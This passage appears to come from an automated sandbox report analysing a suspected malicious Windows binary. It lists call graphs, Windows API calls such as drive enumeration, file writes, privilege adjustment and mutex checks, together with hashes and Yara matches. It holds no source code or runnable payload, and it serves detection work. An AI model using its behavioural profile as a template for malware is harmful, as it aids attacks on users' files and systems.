5039->5036 5039->5038 5041 d8fa9 5040->5041 5042 d86d0 SetFilePointerEx 5041->5042 5043 d86f4 SetFilePointerEx 5042->5043 5045 d876c 5042->5045 5043->5045 5047 d8719 5043->5047 5044 d8757 WriteFile 5044->5045 5045->5027 5046 d872a WriteFile 5046->5045 5046->5047 5047->5044 5047->5045 5047->5046 5048 d1a76 GetLogicalDrives 5049 d6347 2 API calls 5048->5049 5050 d1a95 5049->5050 5051 d530c 10 API calls 5050->5051 5052 d1aaa 5051->5052 5053 d3c7a 10 API calls 5052->5053 5054 d1ab3 5053->5054 5055 d3955 9 API calls 5054->5055 5070 d1ac7 5055->5070 5056 d1b8a 5057 d1b97 5056->5057 5058 d52de 5 API calls 5056->5058 5059 d39da 2 API calls 5057->5059 5058->5057 5060 d1b9d 5059->5060 5062 d3955 9 API calls 5060->5062 5061 d1b81 5064 d542b WaitForSingleObject 5061->5064 5065 d1baa 5062->5065 5064->5056 5074 d90a1 GetProcessHeap HeapFree 5065->5074 5067 d1bb3 5068 d1706 22 API calls 5068->5070 5069 d1b36 CloseHandle 5069->5070 5070->5056 5070->5057 5070->5061 5070->5068 5070->5069 5071 d5840 49 API calls 5070->5071 5072 d1b6a CloseHandle 5070->5072 5073 d5962 EnterCriticalSection LeaveCriticalSection 5070->5073 5071->5070 5072->5070 5073->5070 5074->5067 5075 d56b1 5076 d56b3 5075->5076 5112 d32ff 5076->5112 5079 d9041 2 API calls 5087 d56d0 5079->5087 5080 d57fd 5082 d580a 5080->5082 5132 d90a1 GetProcessHeap HeapFree 5080->5132 5081 d57e0 5089 d3955 9 API calls 5081->5089 5084 d5814 5082->5084 5133 d32a6 EnterCriticalSection DeleteCriticalSection 5082->5133 5146 d53e5 EnterCriticalSection 5084->5146 5087->5080 5087->5081 5090 d3955 9 API calls 5087->5090 5088 d581c 5152 d90a1 GetProcessHeap HeapFree 5088->5152 5089->5080 5091 d571d 5090->5091 5092 d3d4b 6 API calls 5091->5092 5094 d572a 5092->5094 5096 d5735 CreateThread 5094->5096 5098 d575a 5094->5098 5095 d582d 5153 d90a1 GetProcessHeap HeapFree 5095->5153 5096->5094 5096->5098 5100 d578b 5098->5100 5101 d5d61 7 API calls 5098->5101 5099 d5834 5129 d5962 EnterCriticalSection LeaveCriticalSection 5100->5129 5101->5100 5103 d5796 5104 d579f WaitForSingleObject 5103->5104 5130 d33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5103->5130 5131 d33c5 EnterCriticalSection SetEvent SetEvent SetEvent LeaveCriticalSection 5104->5131 5107 d57af WaitForMultipleObjects 5108 d57c1 5107->5108 5109 d57d5 5108->5109 5110 d57ca CloseHandle 5108->5110 5111 d3d4b 6 API calls 5109->5111 5110->5108 5111->5081 5113 d9041 2 API calls 5112->5113 5114 d3308 5113->5114 5115 d3315 InitializeCriticalSectionAndSpinCount 5114->5115 5128 d33b5 5114->5128 5116 d332c 5115->5116 5117 d33b7 5115->5117 5118 d9041 2 API calls 5116->5118 5154 d90a1 GetProcessHeap HeapFree 5117->5154 5120 d3344 CreateEventW CreateEventW CreateEventW 5118->5120 5122 d3391 5120->5122 5123 d32a6 7 API calls 5122->5123 5124 d339f 5122->5124 5123->5124 5125 d31c3 4 API calls 5124->5125 5126 d33ac 5125->5126 5127 d32a6 7 API calls 5126->5127 5126->5128 5127->5128 5128->5079 5129->5103 5130->5104 5131->5107 5132->5082 5134 d32c4 CloseHandle 5133->5134 5135 d32c7 5133->5135 5134->5135 5136 d32ce CloseHandle 5135->5136 5137 d32d1 5135->5137 5136->5137 5138 d32d8 CloseHandle 5137->5138 5139 d32db 5137->5139 5138->5139 5144 d32ee 5139->5144 5145 d32f5 5139->5145 5155 d90a1 GetProcessHeap HeapFree 5139->5155 5141 d32fc 5141->5084 5156 d90a1 GetProcessHeap HeapFree 5144->5156 5157 d90a1 GetProcessHeap HeapFree 5145->5157 5147 d540f 5146->5147 5148 d5401 SetEvent 5146->5148 5149 d540a LeaveCriticalSection 5147->5149 5150 d5413 SetEvent 5147->5150 5148->5147 5148->5149 5149->5088 5150->5149 5152->5095 5153->5099 5154->5128 5155->5144 5156->5145 5157->5141 5158 d4412 5159 d39b7 2 API calls 5158->5159 5160 d441f 5159->5160

      Executed Functions

      Function 000D29F5 Relevance: 26.0, APIs: 17, Instructions: 460sleepsynchronizationthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 d29f5-d2a41 1 d2f9e-d2fa6 0->1 2 d2a47-d2a5d call d85d9 0->2 2->1 5 d2a63-d2a7e call d62a6 2->5 5->1 8 d2a84-d2aa4 call d6347 GetTickCount call d94fe 5->8 13 d2ad4-d2aeb call d2876 call d6347 8->13 14 d2aa6-d2abc GetLocaleInfoW 8->14 27 d2aed-d2af1 call d271b 13->27 28 d2b01-d2b17 call d39da call d3e39 13->28 16 d2abe-d2ac8 14->16 17 d2aca 14->17 18 d2acc-d2ace 16->18 17->18 18->13 20 d2ef0-d2ef6 18->20 22 d2efd 20->22 23 d2ef8 call d597e 20->23 26 d2f01-d2f07 22->26 23->22 29 d2f0e-d2f10 26->29 30 d2f09 call d597e 26->30 36 d2af6-d2afa 27->36 49 d2b1d-d2b31 call d3772 28->49 50 d2b19 28->50 34 d2f45-d2f5f call d2876 call d39b7 29->34 35 d2f12-d2f1f EnterCriticalSection 29->35 30->29 55 d2f6a-d2f6e 34->55 56 d2f61-d2f65 call d1870 34->56 38 d2f28-d2f2e 35->38 39 d2f21-d2f22 CloseHandle 35->39 36->28 40 d2afc call d2876 36->40 45 d2f37-d2f44 DeleteCriticalSection call d90a1 38->45 46 d2f30-d2f31 CloseHandle 38->46 39->38 40->28 45->34 46->45 49->20 59 d2b37-d2b49 call d28ca call d5930 49->59 50->49 60 d2f79-d2f7d 55->60 61 d2f70-d2f74 call d1870 55->61 56->55 59->26 70 d2b4f-d2b5a call d5930 59->70 64 d2f7f-d2f8d ReleaseMutex CloseHandle 60->64 65 d2f93-d2f99 call d6274 60->65 61->60 64->65 65->1 70->20 73 d2b60-d2b6c 70->73 74 d2b6e-d2b78 call d4ea5 73->74 75 d2be6-d2bef call d4ea5 73->75 74->20 80 d2b7e-d2b87 call d4f7a 74->80 81 d2bf1-d2bf3 call d4f7a 75->81 82 d2c62-d2c66 75->82 91 d2b89-d2b8d 80->91 92 d2ba3-d2baa 80->92 89 d2bf8-d2bfb 81->89 85 d2c98-d2ca4 call d4dbe 82->85 86 d2c68-d2c72 call d4f7a 82->86 99 d2ccc-d2d00 call d3c7a call d1894 call d3c7a call d1894 85->99 100 d2ca6-d2caa 85->100 103 d2c88-d2c8c 86->103 104 d2c74-d2c7b call d489e 86->104 89->20 94 d2c01-d2c08 89->94 91->92 96 d2b8f-d2b96 call d49d3 91->96 97 d2bac-d2bb0 92->97 98 d2bc0-d2bc3 92->98 101 d2c1d-d2c20 94->101 102 d2c0a-d2c0e 94->102 96->92 130 d2b98-d2b9d Sleep 96->130 110 d2bb8-d2bbf call d4dbe 97->110 111 d2bb2-d2bb6 97->111 98->103 105 d2bc9-d2bcd 98->105 142 d2d04-d2d09 99->142 100->99 112 d2cac-d2cca call d3c7a call d1894 100->112 101->20 107 d2c26-d2c2a 101->107 102->101 113 d2c10-d2c17 call d242f 102->113 103->85 108 d2c8e-d2c93 call d2946 call d1236 103->108 104->103 125 d2c7d-d2c82 Sleep 104->125 116 d2bcf-d2bd3 105->116 117 d2bd9-d2be1 call d4dbe 105->117 107->20 119 d2c30-d2c3a call d4944 107->119 108->85 110->98 111->98 111->110 112->142 113->20 113->101 116->103 116->117 117->103 119->20 140 d2c40-d2c4b call d4f7a 119->140 125->103 130->92 140->20 149 d2c51-d2c5b Sleep 140->149 142->20 147 d2d0f-d2d30 call d24c2 142->147 153 d2d3b 147->153 154 d2d32-d2d39 147->154 149->140 151 d2c5d 149->151 151->20 155 d2d3d-d2d41 153->155 154->155 156 d2e17-d2e35 call d24c2 155->156 157 d2d47-d2d64 CreateThread 155->157 165 d2e39-d2e3d 156->165 159 d2eec-d2eee 157->159 160 d2d6a-d2d73 157->160 159->20 164 d2ee1-d2ee5 159->164 162 d2d75-d2d9c call d24c2 160->162 163 d2da3-d2dc7 call d24c2 160->163 162->163 173 d2d9e-d2d9f 162->173 175 d2dce-d2e0e call d24c2 * 2 163->175 176 d2dc9-d2dca 163->176 168 d2ee6 CloseHandle 164->168 169 d2e3f-d2e45 WaitForSingleObject 165->169 170 d2e4b-d2e56 call d5962 165->170 168->159 169->170 179 d2e58-d2e5c 170->179 180 d2e97-d2e9b 170->180 173->163 175->165 195 d2e10-d2e15 175->195 176->175 184 d2e5e-d2e62 179->184 185 d2e64 call d1000 179->185 182 d2e9d-d2eba EnterCriticalSection LeaveCriticalSection 180->182 183 d2ebe-d2ec0 180->183 182->183 187 d2ed5-d2ed9 183->187 188 d2ec2-d2ecf WaitForMultipleObjects 183->188 184->185 189 d2e69-d2e6d 184->189 185->189 187->159 192 d2edb-d2edf 187->192 188->187 193 d2e6f call d2946 189->193 194 d2e74-d2e7b 189->194 192->168 193->194 194->180 196 d2e7d-d2e81 194->196 195->165 198 d2e89-d2e8d 196->198 199 d2e83-d2e87 196->199 198->180 200 d2e8f-d2e96 call d4dbe 198->200 199->180 199->198 200->180
      APIs
      • GetTickCount.KERNEL32 ref: 000D2A94
      • GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 000D2AB4
      • Sleep.KERNEL32(00001388), ref: 000D2B9D
      • Sleep.KERNEL32(00000064), ref: 000D2C53
      • Sleep.KERNEL32(00001388), ref: 000D2C82
      • CreateThread.KERNEL32(00000000,00000000,000D239A,?,00000000,00000000), ref: 000D2D55
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D2E45
        • Part of subcall function 000D4F7A: ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
        • Part of subcall function 000D4F7A: CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      • EnterCriticalSection.KERNEL32(?), ref: 000D2EA7
      • LeaveCriticalSection.KERNEL32(?), ref: 000D2EB4
      • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF), ref: 000D2ECF
      • CloseHandle.KERNEL32(?), ref: 000D2EE6
        • Part of subcall function 000D489E: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000000), ref: 000D4908
        • Part of subcall function 000D489E: CloseHandle.KERNEL32(?), ref: 000D491E
        • Part of subcall function 000D489E: CloseHandle.KERNEL32(?), ref: 000D4923
      • EnterCriticalSection.KERNEL32(?), ref: 000D2F13
      • CloseHandle.KERNEL32(?), ref: 000D2F22
      • CloseHandle.KERNEL32(?), ref: 000D2F31
      • DeleteCriticalSection.KERNEL32(?), ref: 000D2F38
      • ReleaseMutex.KERNEL32(?), ref: 000D2F83
      • CloseHandle.KERNEL32(?), ref: 000D2F8D
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CriticalSection$Sleep$CreateEnterMutexReleaseWait$CountDeleteInfoLeaveLocaleMultipleObjectObjectsProcessSingleThreadTick
      • String ID:
      • API String ID: 2025543672-0
      • Opcode ID: 478bfc91c97f3384abc6bea42b5ee0c3417127077b3ab8d0455733fb0756de23
      • Instruction ID: d949b94196b68bc63bb48c7b147db13ca862a7d79e02378b1f61d00a68dd4507
      • Opcode Fuzzy Hash: 478bfc91c97f3384abc6bea42b5ee0c3417127077b3ab8d0455733fb0756de23
      • Instruction Fuzzy Hash: C2F1A572509342AFDB60AF64984166FBBE5AFA4710F04092FF98492392DB71CD458B73
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D271B Relevance: 9.1, APIs: 6, Instructions: 134fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 203 d271b-d2751 call d9041 * 2 208 d2757-d2759 203->208 209 d2836-d2839 203->209 210 d275f-d2768 call d5b20 208->210 211 d2844-d2847 208->211 209->211 212 d283b-d2843 call d90a1 209->212 210->209 225 d276e-d2789 call d59f1 210->225 215 d2849-d2851 call d90a1 211->215 216 d2852-d2855 211->216 212->211 215->216 220 d2857-d285f call d90a1 216->220 221 d2860-d2866 216->221 220->221 223 d2868-d2870 call d90a1 221->223 224 d2871-d2875 221->224 223->224 225->209 232 d278f-d27a7 CreateFileW 225->232 232->209 233 d27ad-d27d7 SetFilePointer call d9041 * 2 232->233 238 d282d-d2830 CloseHandle 233->238 239 d27d9-d27db 233->239 238->209 239->238 240 d27dd-d27e7 SetFilePointer 239->240 240->238 241 d27e9-d27fd ReadFile 240->241 241->238 242 d27ff-d2802 241->242 242->238 243 d2804-d282a MultiByteToWideChar call d2504 242->243 243->238
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6), ref: 000D279B
      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27B8
      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27E3
      • ReadFile.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D27F5
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000), ref: 000D2813
      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,000D2AF6,00000000,?), ref: 000D2830
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$HeapPointer$AllocByteCharCloseCreateHandleMultiProcessReadWide
      • String ID:
      • API String ID: 2550576714-0
      • Opcode ID: acdc214566817b64d428f84326c71c359177ae62f33772f6805bfd17f0210ab2
      • Instruction ID: 74305a18327c4b346f6aace5d2c20196b7e97fe68855425b30e96342631f21ac
      • Opcode Fuzzy Hash: acdc214566817b64d428f84326c71c359177ae62f33772f6805bfd17f0210ab2
      • Instruction Fuzzy Hash: A6417171D02315BEDB21ABA5AC45DEFBFF8EF95711F24012BF500A1252DA324E41DAB4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3E39 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 246 d3e39-d3e4d GetVersion 247 d3e4f-d3e50 246->247 248 d3e52-d3e67 GetCurrentProcess OpenProcessToken 246->248 249 d3e99-d3e9d 247->249 250 d3e69-d3e85 GetTokenInformation 248->250 251 d3e8a-d3e8e 248->251 250->251 252 d3e87 250->252 251->249 253 d3e90-d3e93 FindCloseChangeNotification 251->253 252->251 253->249
      APIs
      • GetVersion.KERNEL32(?,000D2B0D), ref: 000D3E42
      • GetCurrentProcess.KERNEL32(00000008,?), ref: 000D3E58
      • OpenProcessToken.ADVAPI32(00000000), ref: 000D3E5F
      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 000D3E7D
      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 000D3E93
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpenVersion
      • String ID:
      • API String ID: 4059737031-0
      • Opcode ID: e11017a7fcfc2a7985573c719938e61441489b0c90b62fa69e9d5865115b4ce6
      • Instruction ID: b5f7c535e8d40dc740322e010888b519ec37260855ac5862d3d17b042bd4d0ec
      • Opcode Fuzzy Hash: e11017a7fcfc2a7985573c719938e61441489b0c90b62fa69e9d5865115b4ce6
      • Instruction Fuzzy Hash: D0F03C75A01218FBEB519BA4DC09BDEBBB8FB05701F104066FA02E21D0D7749B44DBB6
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4EA5 Relevance: 6.1, APIs: 4, Instructions: 83synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 254 d4ea5-d4f15 call d3c7a call d6347 call d5a46 * 2 call d5fe7 265 d4f4d 254->265 266 d4f17-d4f28 OpenMutexW 254->266 269 d4f4f-d4f53 265->269 267 d4f39-d4f49 WaitForSingleObject 266->267 268 d4f2a-d4f37 CreateMutexW 266->268 271 d4f4b 267->271 272 d4f62-d4f79 call d39da * 2 267->272 268->267 270 d4f60 268->270 269->272 273 d4f55-d4f5e CloseHandle 269->273 270->272 271->269 273->272
      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      • OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F1E
      • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F2D
      • WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 000D4F3C
      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 000D4F56
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseCreateHandleInformationObjectOpenSingleVolumeWait
      • String ID:
      • API String ID: 1595014494-0
      • Opcode ID: 2b2cb6ca0e58bdc12da7dacd987a6fd1f8621be6730428bd06704f4441dc06a5
      • Instruction ID: 09901169e8f6a17246cf30480f5565940c721b3c2bae5d70058ce6f275c01ee4
      • Opcode Fuzzy Hash: 2b2cb6ca0e58bdc12da7dacd987a6fd1f8621be6730428bd06704f4441dc06a5
      • Instruction Fuzzy Hash: 5D2190B6A00308AFDB10AFA4DC858ADBBF9FB84354F20443BF585A7311DA749D458B31
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D4F7A Relevance: 3.0, APIs: 2, Instructions: 20synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 278 d4f7a-d4f86 call d4ea5 280 d4f8b-d4f90 278->280 281 d4fa4-d4fa8 280->281 282 d4f92-d4f9e ReleaseMutex CloseHandle 280->282 282->281
      APIs
        • Part of subcall function 000D4EA5: OpenMutexW.KERNEL32(00100000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F1E
        • Part of subcall function 000D4EA5: CreateMutexW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 000D4F2D
        • Part of subcall function 000D4EA5: WaitForSingleObject.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 000D4F3C
        • Part of subcall function 000D4EA5: CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 000D4F56
      • ReleaseMutex.KERNEL32(?,?,00000000,00000000,?,000D2C6F,00000001), ref: 000D4F95
      • CloseHandle.KERNEL32(?,?,000D2C6F,00000001), ref: 000D4F9E
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: c070002ccb17989bd0d4e0555969de656eeb5a1c44077f4edc806750db498ffa
      • Instruction ID: 01129b40b97a481746121da6e5b84db39663374327d7009b10ab2b8c5f16d809
      • Opcode Fuzzy Hash: c070002ccb17989bd0d4e0555969de656eeb5a1c44077f4edc806750db498ffa
      • Instruction Fuzzy Hash: DFD0EC72901229BFDF115B94DC0B88D7B68EF017647100161F90562220D7719E1497E0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D2FA7 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 283 d2fa7-d2fae call d29f5 ExitProcess
      APIs
        • Part of subcall function 000D29F5: GetTickCount.KERNEL32 ref: 000D2A94
        • Part of subcall function 000D29F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 000D2AB4
      • ExitProcess.KERNEL32 ref: 000D2FAE
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: 7aa59cf980dd832dc41ca93f496a680bc019c41d0d027142bbada03cb6b016c1
      • Instruction ID: 0d37f0003fedabae44422ef7a81d9989957d2918427f6045fe3d1fc734fc3b25
      • Opcode Fuzzy Hash: 7aa59cf980dd832dc41ca93f496a680bc019c41d0d027142bbada03cb6b016c1
      • Instruction Fuzzy Hash: B390022124920197E2803760591E7486A105B16716F044102B505941929D5400105532
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D3C7A Relevance: 1.5, APIs: 1, Instructions: 36COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 286 d3c7a-d3caa call d3bb3 call d90c6 GetVolumeInformationW 291 d3cac 286->291 292 d3caf-d3cbc call d39da 286->292 291->292
      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 59e412a38a4fc0e081b0da7c3ea6260f7183367ecd224eaec91d415d23fdbe4a
      • Instruction ID: ac6a72a7240c02644a2ed02617665afa63f9294f94532e3331b854f2e6d164f4
      • Opcode Fuzzy Hash: 59e412a38a4fc0e081b0da7c3ea6260f7183367ecd224eaec91d415d23fdbe4a
      • Instruction Fuzzy Hash: 7EE0EC72511224BD662457569D4ACFF7F7CDF82670710005BF90597241E6745F01D6F1
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 000D3DC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47COMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(00000020,+#,00000000,?,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,+#,?), ref: 000D3DEE
      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,000D232B), ref: 000D3E1D
      • CloseHandle.KERNEL32(+#,?,?,?,?,?,?,?,000D232B,00000000), ref: 000D3E2D
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmpDownload File
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
      • String ID: +#$+#
      • API String ID: 3038321057-4063140741
      • Opcode ID: bc9f10684c73e13686a51ead17654a2acc78b4901164dd1340059a4270bd9a9f
      • Instruction ID: 6291d21eb3e3b18d1d572b927c9d9d8cc425b01b71544b8d7d35ad56e5a8b100
      • Opcode Fuzzy Hash: bc9f10684c73e13686a51ead17654a2acc78b4901164dd1340059a4270bd9a9f
      • Instruction Fuzzy Hash: 6F011A76A01228ABDB109FA5DC48AEFBFBCEF49751F044026F905E2290D7788645CBB5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 000D5D61 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109fileCOMMON
      Download Yara Rule
      APIs
